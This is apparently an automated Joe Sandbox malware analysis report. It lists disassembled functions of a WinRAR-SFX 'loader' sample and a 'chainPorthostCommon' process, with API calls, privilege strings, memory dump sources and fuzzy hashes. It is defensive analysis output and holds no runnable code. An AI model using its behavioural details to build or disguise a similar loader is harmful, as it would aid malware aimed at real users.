                                                                                    • Instruction ID: 6d0ef2c5b705c601f54084472a1bd689a4d3bd71e2527ac5112d729d5dbfd804
                                                                                    • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                    • Instruction Fuzzy Hash: 5B516F71E0010AEFDF14DFA8C881AFDBBB6EF58315F248169E854E7341E7759A098B60
                                                                                    Function 00639382 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00639387
                                                                                      • Part of subcall function 0063C29A: _wcslen.LIBCMT ref: 0063C2A2
                                                                                    • _swprintf.LIBCMT ref: 00639465
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog__vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: rtmp%d
                                                                                    • API String ID: 1262143012-3303766350
                                                                                    • Opcode ID: 461895aaadfccc53b640ae23cd6622d4852535790a2fffb60b8e885d935603fa
                                                                                    • Instruction ID: 78cb745a3d59439401a46d573b214a6d1695405109dd72bc754d6a640da1bcc2
                                                                                    • Opcode Fuzzy Hash: 461895aaadfccc53b640ae23cd6622d4852535790a2fffb60b8e885d935603fa
                                                                                    • Instruction Fuzzy Hash: 6141B57190026466DF61EBA0CC45EDE737EAF51350F4048A9B649E3152DBB88BC98FB4
                                                                                    Function 0063B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: *
                                                                                    • API String ID: 2691759472-163128923
                                                                                    • Opcode ID: 9148948dd7b76b07cdc0145f3d465fcb46f985a0b70d2517a649dc3793c04321
                                                                                    • Instruction ID: 6e858c90af20bc3abebeacdbeb1e8394cace2c8368367d85122b216856ce9c8b
                                                                                    • Opcode Fuzzy Hash: 9148948dd7b76b07cdc0145f3d465fcb46f985a0b70d2517a649dc3793c04321
                                                                                    • Instruction Fuzzy Hash: E8316832544311AADB30EE1499026FB73E7DFD1B10F14A01EFB845724BE7268D4693EA
                                                                                    Function 006531D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _abort
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 1888311480-2084237596
                                                                                    • Opcode ID: c2a599be695c8d5647c2223a966babfe613a4abd293e467d287912e9601a909c
                                                                                    • Instruction ID: 39a013546f226c569df73e7292414694b661357216c6ca3bc6a12b1de7385b50
                                                                                    • Opcode Fuzzy Hash: c2a599be695c8d5647c2223a966babfe613a4abd293e467d287912e9601a909c
                                                                                    • Instruction Fuzzy Hash: 7B41673290021AAFCF15DF98CC81AEEBBB6BF08745F188099FD04A7311D335AA54DB54
                                                                                    Function 00637401 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00637406
                                                                                      • Part of subcall function 00633BBA: __EH_prolog.LIBCMT ref: 00633BBF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                    • API String ID: 3519838083-639343689
                                                                                    • Opcode ID: dc8f9ce09584b82317e3a396571ec632507a7e3a16e7eda1c127cfe13954f0f9
                                                                                    • Instruction ID: 10a6c3ad875cb1b58a0066250893aa43b89aa84c80929871b8ee4d724493ce14
                                                                                    • Opcode Fuzzy Hash: dc8f9ce09584b82317e3a396571ec632507a7e3a16e7eda1c127cfe13954f0f9
                                                                                    • Instruction Fuzzy Hash: 3131C6B1D04258AADF65EFA4CC45BEE7FBBAF05314F04401AF445AB382CB749A84C7A5
                                                                                    Function 0064B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: }
                                                                                    • API String ID: 176396367-4239843852
                                                                                    • Opcode ID: ca7077411cbf74d8bab5c417b96e5df80a3451c7baa8504416be511720d55a2a
                                                                                    • Instruction ID: 9a569ec6cd825267c1e492fd5575765d36cecf5d85f3ac6ea2156bc1b66c34f5
                                                                                    • Opcode Fuzzy Hash: ca7077411cbf74d8bab5c417b96e5df80a3451c7baa8504416be511720d55a2a
                                                                                    • Instruction Fuzzy Hash: 4A21F07290431A5AD735EF68D845EABB3EEDF91750F04142EF940C3341EB65DD4883A6
                                                                                    Function 0064DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: Software\WinRAR SFX$d
                                                                                    • API String ID: 176396367-4033024366
                                                                                    • Opcode ID: 6d09adb76ca96b4a5fe8f2292424542c353bccf5514896f0e857f518a122be77
                                                                                    • Instruction ID: 408f10e70a689fac787fdce98bee2cc0adbd2236435b05d7b6412174e35c719a
                                                                                    • Opcode Fuzzy Hash: 6d09adb76ca96b4a5fe8f2292424542c353bccf5514896f0e857f518a122be77
                                                                                    • Instruction Fuzzy Hash: 10018B71900128BAEB219F91DC0AFDF7FBEEB45790F004056B509A11A0D7B18A88CBA1
                                                                                    Function 0064AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0063C29A: _wcslen.LIBCMT ref: 0063C2A2
                                                                                      • Part of subcall function 00641FDD: _wcslen.LIBCMT ref: 00641FE5
                                                                                      • Part of subcall function 00641FDD: _wcslen.LIBCMT ref: 00641FF6
                                                                                      • Part of subcall function 00641FDD: _wcslen.LIBCMT ref: 00642006
                                                                                      • Part of subcall function 00641FDD: _wcslen.LIBCMT ref: 00642014
                                                                                      • Part of subcall function 0064AC04: SetCurrentDirectoryW.KERNELBASE(?), ref: 0064AC08
                                                                                    • _wcslen.LIBCMT ref: 0064AE8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                    • String ID: <d$C:\Users\user\Desktop
                                                                                    • API String ID: 3341907918-478003630
                                                                                    • Opcode ID: b854f2c1344c7832eeaae4fb4366ccaf3fecd9230ff46c71d668a2847295297d
                                                                                    • Instruction ID: e39d08bea5476c48c5655e613f19ec7b6ad69a89b457200b05552406e0717054
                                                                                    • Opcode Fuzzy Hash: b854f2c1344c7832eeaae4fb4366ccaf3fecd9230ff46c71d668a2847295297d
                                                                                    • Instruction Fuzzy Hash: 2D014471D40229A6DF51ABE4DD0AEDF77FEAF09700F00045AF606E3191E6B49684CBA9
                                                                                    Function 0064B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Malloc
                                                                                    • String ID: (d$Zd
                                                                                    • API String ID: 2696272793-2178031859
                                                                                    • Opcode ID: 9820b57c93299213c19e17db2e59769bb60e1e0f079cd134ad513e6c2a4cef57
                                                                                    • Instruction ID: ce3be0bfe547da4b473ebc8677cf8c9321213c2f36c2c6911b6cc05d9b724e6a
                                                                                    • Opcode Fuzzy Hash: 9820b57c93299213c19e17db2e59769bb60e1e0f079cd134ad513e6c2a4cef57
                                                                                    • Instruction Fuzzy Hash: 490146B6600118FF9F059FB0DC49CEEBBAEEF08344700115AB906D7220E631AA44DBA0

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:4
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 8130 7ffd347eecf1 8131 7ffd347eed66 8130->8131 8131->8131 8132 7ffd347eee3b QueryFullProcessImageNameA 8131->8132 8133 7ffd347eeeb4 8132->8133

                                                                                    Executed Functions

                                                                                    Function 00007FFD343F0D48 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 257 7ffd343f0d48-7ffd343f0e41 call 7ffd343f07d8 270 7ffd343f0e59-7ffd343f0eb9 257->270 276 7ffd343f0ebb-7ffd343f0f05 270->276 277 7ffd343f0e52-7ffd343f0e58 270->277 281 7ffd343f0f07-7ffd343f0f1d 276->281 282 7ffd343f0f1e 276->282 277->270 281->282 283 7ffd343f0f1f-7ffd343f0f67 281->283 282->283 288 7ffd343f0f6f-7ffd343f1050 283->288
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5Y_H
                                                                                    • API String ID: 0-3237497481
                                                                                    • Opcode ID: 61bb9639e054a4800ac786bfe74dfe1dc80ff006459b42e6c6e7711cca5ca787
                                                                                    • Instruction ID: 612147881d73cfebae2849f1b401293db5723d75177cd1ee31620a3c64e4e48c
                                                                                    • Opcode Fuzzy Hash: 61bb9639e054a4800ac786bfe74dfe1dc80ff006459b42e6c6e7711cca5ca787
                                                                                    • Instruction Fuzzy Hash: 2291AF76A18A898FE759EB6C88657F97FE1FB96310F4001BFD049D72D2CE7918158700
                                                                                    Function 00007FFD343F0E43 Relevance: .2, Instructions: 172COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff479655eaa78f25bde5bb6171f506b4df4e4240a6acc775a42093cc68e09bc7
                                                                                    • Instruction ID: 4ff94b81999ad5d94e92c8a8af5a88065f1810b379ff56134eff1e8259710d20
                                                                                    • Opcode Fuzzy Hash: ff479655eaa78f25bde5bb6171f506b4df4e4240a6acc775a42093cc68e09bc7
                                                                                    • Instruction Fuzzy Hash: 04518F76B18A4D8BE798DB5C98657F9BFE1FB9A310F5002BFC009D76D1CAB914118B00
                                                                                    Function 00007FFD347EECF1 Relevance: 1.7, APIs: 1, Instructions: 248COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2364332811.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd347e0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID: FullImageNameProcessQuery
                                                                                    • String ID:
                                                                                    • API String ID: 3578328331-0
                                                                                    • Opcode ID: 576146864a6a8ebafac5cd2f306df8e716da4186193ae0d1e4a1b3d98ad089a3
                                                                                    • Instruction ID: 75e5f0b74f10db6b7a4468741e5bb01f978e08d1240bf7cc52e87d39e2fb3ea3
                                                                                    • Opcode Fuzzy Hash: 576146864a6a8ebafac5cd2f306df8e716da4186193ae0d1e4a1b3d98ad089a3
                                                                                    • Instruction Fuzzy Hash: 4171A470618A8C8FDB68DF28D8957F937E1FB59311F04422EE84EC7292CB75A845CB81
                                                                                    Function 00007FFD343F08D0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7J4
                                                                                    • API String ID: 0-1321531618
                                                                                    • Opcode ID: c63b62705ba12ab851b81aa8b888fbd1846e2e2150d896f3efb810b2873d7714
                                                                                    • Instruction ID: 83ee54297cad118e0d738aa7982e94436bb3acc2df82c39e706a4b8dc2ee17d2
                                                                                    • Opcode Fuzzy Hash: c63b62705ba12ab851b81aa8b888fbd1846e2e2150d896f3efb810b2873d7714
                                                                                    • Instruction Fuzzy Hash: 79416622B4D56A0EE711B3BC64BA2F97BA0DF46321F1805BFD58DC71D3CD2968818280
                                                                                    Function 00007FFD343F0960 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7J4
                                                                                    • API String ID: 0-1321531618
                                                                                    • Opcode ID: 51c8106e3070ad5d835b2b673346248b16e92062aa1a17bcf48a1b76faaae9ce
                                                                                    • Instruction ID: a657ab90f7ff5c8ecc9f8d1e98211a85af33423bd29edf53e0d1dbffb3d9c3bb
                                                                                    • Opcode Fuzzy Hash: 51c8106e3070ad5d835b2b673346248b16e92062aa1a17bcf48a1b76faaae9ce
                                                                                    • Instruction Fuzzy Hash: 97313722B0D95A1FE754B3AC64AA6F973D5DF4A321F1400BFD40EC31D3CD2DA8818284
                                                                                    Function 00007FFD343F0998 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7J4
                                                                                    • API String ID: 0-1321531618
                                                                                    • Opcode ID: 95ec71e36e969429fa9b4265082e4b314b8fa0313451ed826faac71bddb368c0
                                                                                    • Instruction ID: a6e109fe895a8820180816996cf6930b01da69b1f5e4dc1e841b485adf96e96e
                                                                                    • Opcode Fuzzy Hash: 95ec71e36e969429fa9b4265082e4b314b8fa0313451ed826faac71bddb368c0
                                                                                    • Instruction Fuzzy Hash: 9E213521B5C95A0FE748F72C98BA6B977C2EF9A310F0400BDE84EC32D3DD28AC418644
                                                                                    Function 00007FFD343F0C25 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: db0aef072ec64929b5b35d505abda884b126e8e6653ca62790435b13f0a165cb
                                                                                    • Instruction ID: f635705e41577bd4d972c219ecfbd37066fccb1de74bde070d647042dbdc5e89
                                                                                    • Opcode Fuzzy Hash: db0aef072ec64929b5b35d505abda884b126e8e6653ca62790435b13f0a165cb
                                                                                    • Instruction Fuzzy Hash: 4A210436B0E2898FE312EB2C88A51DD7FB0DF43324F1541B6C180DB192E93C16499781
                                                                                    Function 00007FFD34556062 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2362677341.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 839cf054f40f1eaf073a754b952fd925ededef5316f6ec54510772f4045a6471
                                                                                    • Instruction ID: fb0147643ad015df662eae5a1cd7672db4baeb94f9e03f3e46305a029038bce0
                                                                                    • Opcode Fuzzy Hash: 839cf054f40f1eaf073a754b952fd925ededef5316f6ec54510772f4045a6471
                                                                                    • Instruction Fuzzy Hash: B52130B1E099894FDF98EB1C84A5AB4B7E1FB64304B0441FED18DE7192CD35A8C88B51
                                                                                    Function 00007FFD343F108D Relevance: .1, Instructions: 55COMMON
